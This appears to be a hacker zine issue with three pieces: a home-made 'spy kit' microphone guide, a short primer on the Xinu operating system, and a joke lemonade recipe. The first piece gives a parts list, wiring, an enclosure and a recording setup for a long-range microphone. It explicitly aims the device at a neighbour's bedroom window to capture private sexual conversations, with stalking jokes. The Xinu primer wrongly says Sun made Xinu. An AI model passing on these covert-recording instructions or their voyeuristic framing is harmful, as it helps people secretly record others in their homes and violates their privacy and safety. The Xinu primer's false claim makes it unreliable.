XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX through out this article, i'll be referring by "leet recording spy kit" (or lrsk(c)) to an inexpensive home made audio spying system. the idea is to have a box, with your favorite audio recorder, capable of capturing clean sounds over 50 yards without having the signal headroom bottlenecked by proximity noises. (why? might get you some pussy.) first, the most sensitive types of microphones are condensors which uses a double layered capacitor mechanism to convert air waves into electric signals. first thing you need is a the super mic.o-O 1) pass by a perchman at lunch break, and steal his shotgun ^-- elite 2) get leet and build your own ^-- gay(more suitable for this issue) MICROPHONE CIRCUIT SCHEMATIC R1 -----------*------/\/\/\------*------------ | | | + | + | | | | | --- --- === | C1 ^ C2 ^ B1 - 9V | ===== ===== === | === === | | = = | | | | ===== | === | = | | | \ | Signal \------------------------------------------------> Ground MIKE /------------------------------------------------> / | | | | ===== === = Ground this is a pressure zone mic (PZM) in a perfect world, this would be the simplest explanation of the circuitry envolved. B1 is a 9V battery with two leads. C1 is 0.1 uF ceramic monolithic capacitor mounted as close as possible to the microphone element terminals. This capacitor primarily functions to limited radio frequency (RF) interference. The circuit will work without it but it will be more susceptible to RF. MICROPHONE ELEMENT - Any small electret condenser microphone element should work. RadioShack got one with a fairly uniform frequency response for about $3 US R1 is a 3.3k, ~1/8watt, carbon film resistor. This part will deal with the amperage in the circuit. next thing we need is audio cables don't go gayass-cheap on this item!! or you'll get ground loops and RF interference all over! get a decent 3-conductor cable (Canare kicks ass) for the plug, you need an XLR (? & ?) it goes like this: pin 1 ---> signal (-) pin 2 ---> signal (+) pin 3 ---> ground rosin-core solder is recommended for soldering the connections. and remember if you cross link 1 and 2, you'll have a 6db reduction due to mis-phased signal. (crossing 1 and 3 will be unshielded, but mostly okay) now, having meticulously mounted the microphone element, and the circuit parts -==- you need a plastic diner plate (25 cm wide) and drill a tiny (0.5 cm) hole about 3 cm off the center. turn the plate, and mount the microphone element through the hole you made and duck tape it. the 9v power supply should be well stabilised also. now turn back the plate, and apply a plastic food wrap layer over it. (this is mostly humid proofing, or else you will have static hushes after the first night of neighbour MILF stalking)<---h0h0h0 :/ next thing you need is 2 plastic flower pots.one big enough to house the little one. cut the base of the smaller one, and mount your plate on top of it, duck tape it. drill a hole in down the bigger pot's base, to pass the audio cable through. -==- house the little pot inside the big one. and cover the top with a cotton/polly cloth or a piece of clean foam. and your lrsk(c) will look something like: foam --> ________________________ /| |\ big pot -------> | | | | | | | | | \___ * ________/ | | | | | | pressure zone cabinet-------> | | | | | | | | baby pot --------> | | | | | | | | | |____|___|_________|___| | | audio cable ---> |____________________~ the last part is choosing your recording media. since you have a +48 DC (phantom powered mic) and I'm assuming you got not pre amplifier at home that handles it, i say you might need a DI converter. a DI (direct inject box) is a little piece of hardawre that converts your mic audio signal to line audio signal. you can find those from BSS, Behringer products, but I say for your neighbourhood espionnage, let's go for something cheaper. You can find a little plug converter, powered by a 1.5 AA in most of music stores, guitar shops, electronics... that looks something like this: tip ---> /\ -- ring ---> | | |--| | | sleeve ---> | | | | | | ------- | | | | power supply----> | | | | |_______| | ? ? ? | female XLR ---> | ? ? ? | |_^_^_^_| this is a typical converter, with a TRS 1/4" jack plug. now you need an audio appliance with a Jack input. that could be a Hi Fi stereo system, a DVD player with karaoke mic input, a guitar amplifier... or better your sound card (since you want to save your neighbour's sex convos) what you need is to camouflage your lrsk(c) and point it to the MILF bedroom window. (PS: if done with care, this PZM mic will capt sounds at amazing distances. and keep in mind that the audio cable length should be less than 15 meters) ---===<<<<>>===--- . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Table of contents: [1] - Compiling and running source code [2] - Architecture details [3] - Outro, Credits, Shoutz, Resources & Fin The version that will be described in this article is 7.0. I don't think anyon e will ever be able to use any of this stuff, so it will be strictly educational for the specially interested [if you dont care about rare o/s'es just skip the section, no one will be forcing you to read]. Xinu OS is made by Sun. Xinu is an educational system. [1] - Compiling and running source code Here I will describe how to compile and run programs on an Xinu system. You use the tool 'xcc' to compile programs, and 'getxinu' to run the output. These tools are located in ~xinu/bin. Here is some Xinu source code that will just print some text and exit: #include main() { printf("zippa dee doo dah\n"); } To compile/link the program type: xcc zippa.c Somethings to note about the Xinu compiler xcc is that it behaves nearly identic to gcc, except 2 parameters behaving paranormally compared to the standard gcc usage. Then, if there are no problems occuring, an executable image will be created in the file a.out. Use the getxinu command to run this on the system like this: getxinu a.out (type 'getxinu -m xxx a.out' to specy a specific xinu machine to run, where xx x = the specific machine) On Xinu networks usually if there is no free Xinu machines the user will be queued and have to wait till a machine is unused. To stop waiting, you can type 'q' to quit or 's' to see how the queue status. When a machine is available you will see a msg printed reporting which machine you are assigned to and you are connected to that very machine and get the console. The remaining stuff is to load and run the Xinu program, a.out. We have to put the machine in a state where the PROM monitor has control. Press RETURN a few times to check this. When the monitor is running it will answer with it's prompt '>'. If otherwise the machine is running someone elses leftover Xinu program or it has crashed. Type '\b' to send a BREAK which will cause the machine to stop whatever it is doing and return the monitor. Now you can usually load the xinu program and run by issuing the proper boot command to the monitor: ble() yourlogin/progname (progname = a.out) You will see something like this: Xinu Version 7.0 SUN3 620795 bytes real mem 43404 bytes Xinu code clock enabled zippa dee doo dah All user processes have completed. [2] - Architecture Details Now, type \q to quit the getxinu, let's go on looking at some architecture det ails showing how the xinu sys uses the motorola 68010/68020 processors. These proce ssors are standard 32-bit processors. 68010 registers can move or operate data which is located in these registers or the memory can also receive interrupts from exte rnal source and the alike. The 68000 series processors differentiate between regist ers that hold data and the registers that keep addresses. There is 8 data register s referred to as 'd0' thru 'd7', 7 standard address registers ('a0' thru 'a6') a nd the special stack address register, which is a7. Also there is a status reg. ( sr) and the program counter (pc). As your xinu k0d3 is booted the machine is placed in supervisor mode. When it's booted xinu never puts the machine in user mode as it is operating, i.e source code is always ran in supervisor mode, therefore you can access the sys tem byte of the status register, which is 16 bits wide. Lower 8 bits are the user byte and their interpretations are shown in this very table taken from ugrad.cs.ubc .ca: Bit Meaning =============-===== 0 Carry Flag 1 Overflow Flag 2 Zero Flag 3 Negative Flag 4 Extend Flag 5-7 Not Used Status Register User Byte User byte just containts arithmetic flags. The upper bits (system byte) shown HERE: Bit Meaning ========================== 0-2 Interrupt Level Mask 3-4 Not Used 5 Supervisor Mode Flag 6 Not Used 7 Trace Mode Flag Status Register System Byte Usage of the the supervisor mode bit is to control if the processor is in supe rvisor mode or not (over bit 1 means supervisor mode as bit = 1 --> supervisor mode) while the "trace mode" acts alike. In a "trace mode", a "trace exception" is created as an effect of each instruc tion that is excited. First 3 bits are used to make an interrupt priorty level which is interpreted as a number 0 thru 7. If the level is set to N all the interrupts that is not greater than N will be ignored. [3] - Various other information - the source for routines are in the dir ~xinu/xinu.sun3/src/sys/sys and the h eader files in ~xinu/xinu.sun3/src/sys/h. - use the xcc parameter -S to generate assembly code for your application. - format of xinu stack frame: +-----------------------+ SP | | +-----------------------+ (-n*4) | local variable n | +-----------------------+ . . . . . . +-----------------------+ (-8) | local variable 2 | +-----------------------+ (-4) | local variable 1 | +-----------------------+ A6 | old A6 | +-----------------------+ (+4) | return address | +-----------------------+ (+8) | parameter 1 | +-----------------------+ (+12) | parameter 2 | +-----------------------+ . . . . . . +-----------------------+ (+n*4+4) | parameter n | +-----------------------+ during the execution of a process at any time it's stack consits of those stac k frames piled end to end with the sp pointing just under the local variables of the active stack frame. stack ascii from ugrad.cs.ubc.ca. [3] - Outro, Credits, Shoutz, Resources & Fin All in all Xinu is a fine operating system with it's threads and micro kernel architecture which makes it fitted for embedded applications. It even has a TC P/IP stack! Even though, I doubt the xinu o/s is going to take over the IT world, h eh. Remember, you probably won't be able to do anything with this information, it' s cool learning. Thanks to ugrad.cs.ubc.ca for the being the resource of 99% of the i nfo, so thanks to Peter Phillips, Graeme Clark, Terry Coatta, and Barry Brachman. S houtz goes to all cool people on the eris free network that know me. URLs: [1] http://www.sci.csuhayward.edu/~billard/cs4560/node21.html [2] http://www.cs.purdue.edu/homes/brylow/xinu/ Also you should grab the book "Internetworking with TCP/IP", which uses Xinu ( if anyone really cares). That's it. . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x09] Making the Perfect Summertime Lemonade .x[t.Transient] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX // Making the Perfect Summertime Lemonade // t.Transient (bill@microsoft.com) ********** DISCLAIMER ************** !!!!!!READ AT YOUR OWN RISK!!!!!!!!! I nor b4b0 take responsibility for the contents within! If you squirt lemon juice in yer eye, it's yer own fault. Also, this is only 0day until around September; then autumn comes and everything changes. Also, Kraft Foods(TM) wants you to know this about Kool-Aid(TM)(R)(C): http://www.kraftfoods.com/koolAid/ka_privacy.html '0h J34h!' may or may not be Copyright(C) Kraft Foods, Inc. (Notice their use of a 'K' to simulate 1337sp34k. Phagz.). !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ************************************ Ok folks, listen up. I'm going to say this once, and only once. I don't have time to be schooling you kids all day. I have things to do. Follow my instructions and you'll have the *perfect* summertime lemonade. Deviate and... well.. you won't. Expert haqrs only! ** STEP ONE: GO TO THE STORE A crucial step. Not getting to the store can mean not getting a packet of lemonade flavored Kool-Aid(TM), which is what you need if you're going to pull this off. ++++++++NEWBIE NOTE: If a huge-ass pitcher with a face on it busts through the wall and yells: ------------------------------------------------------------ root@blackdove~# sysvbanner OH JEA\!\!\!@#$ ####### # # # # # # # # # # # # ####### # # # # # # # # ####### # # # ####### # ### ### ### ##### # # ##### # # # # ### ### ### # # # # # # # # # # # ### ### ### # ### # ####### # # # ##### # # # # # # # # # # # ##### # # # ####### # #### ####### # # # # # # # ### ### ### # # # # # # ##### ####### # # ### ### ### ##### # # ##### root@blackdove~# ------------------------------------------------------------ don't be alarmed. This happens all the time. THe crazy bastard appears everywhere incessantly. Just walk away and ignore him; leading him on only makes things worse. ANYWAYS.............. ** STEP TWO: GO BACK TO YOUR HOUSE. Assuming that you have a house. Chances are you live in an apartment with your mom, or all by yourself. Watever, that works. Just go back to where you came from. ** STEP THREE: GET A BIG-ASSED GLASS THING In the midwest they're called 'pitchers'. Dunno what you commies in NY and CA call em... as for those of you outside the States, I won't even venture or bother to assume. Go find a big glass container, clear out all the dead bugs (since you haven't used it since last summer), and pour HALF of the powder into it..... I SAID HALF....... ..... HALF == 1/2 == .5. ** STEP FOUR: JUST ADD WATER If you're in a communist nation (ie. Canada, or France), water might be rationed out. If you're in America, it's plentiful and you can just flip open your thingie on the sink and fill up the glass container us cowboys call a 'pitcher'. Fill it up until it's 3/4 of the way full. ** STEP FIVE: Add Kool-Aid(TM) Put the rest of the Kool-Aid(TM) in the pitcher with the water and the first dose of Kool-Aid(TM). Stir with a wooden spoon (the same kind that your mom used to beat you with). LISTEN TO ME VERY CAREFULLY: Let this sit for 10 minutes. Add a squirt of lemon juice from a real lemon. Add THREE cubes of ice. ** STEP SIX: 0H J34H!!!!#@$ Drink it. - 0day from t.Transient Property of b4b0 . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ______________________________________/\\\__________________________ \/\\\ \/\\\ ____ __/\\\\\\\\___/\\/\\\\\\_ ____ \/\\\__ _____ _____ __ ___ /\\\/////\\\_\/\\\////\\\___ /\\\\\\\\\ _____ _____ ___ /\\\\\\\\\\\ \/\\\ \//\\\ /\\\////\\\ \//\\/////// \/\\\ \/\\\ \/\\\ \/\\\ _________\//\\\\\\\\\\_\/\\\___\/\\\_\//\\\\\\\/\\__________________ \////////// \/// \/// \///////\// ___________________________________/\\\\\___________________________ /\\\/// /\\\ ____ _____ ____/\\\\\ ___/\\\\\\\\\___ _____ _____ ____ ____ ____ ____ /\\\///\\\__\////\\\// ____ _____ _____ /\\\__\//\\\ \/\\\ \//\\\__/\\\ \/\\\ ______________________\///\\\\\/______\/\\\_________________________ \///// \/// ___________________/\\\\\\\___________________________/\\\__________ /\\\/////\\\ \/\\\ /\\\ \//\\\ \/\\\ /\\/\\\\\\\__\/\\\ \/\\\ /\\\\\\\\\ \/\\\ ___ \/\\\/////\\\_\/\\\ ___\/\\\_\////////\\\ ___ /\\\\\\\\\__ __ ___ \/\\\ _\/// _\/\\\___ \/\\\ _ /\\\\\\\\\\___/\\\////\\\ __ \/\\\ \//\\\____/\\\ /\\\/////\\\ \/\\\__\/\\\ \/\\\ \///\\\\\\\/ \//\\\\\\\\/\\ \//\\\\\\\/\\ \/// \/////// \////////\// \///////\// ____________________________________________________________________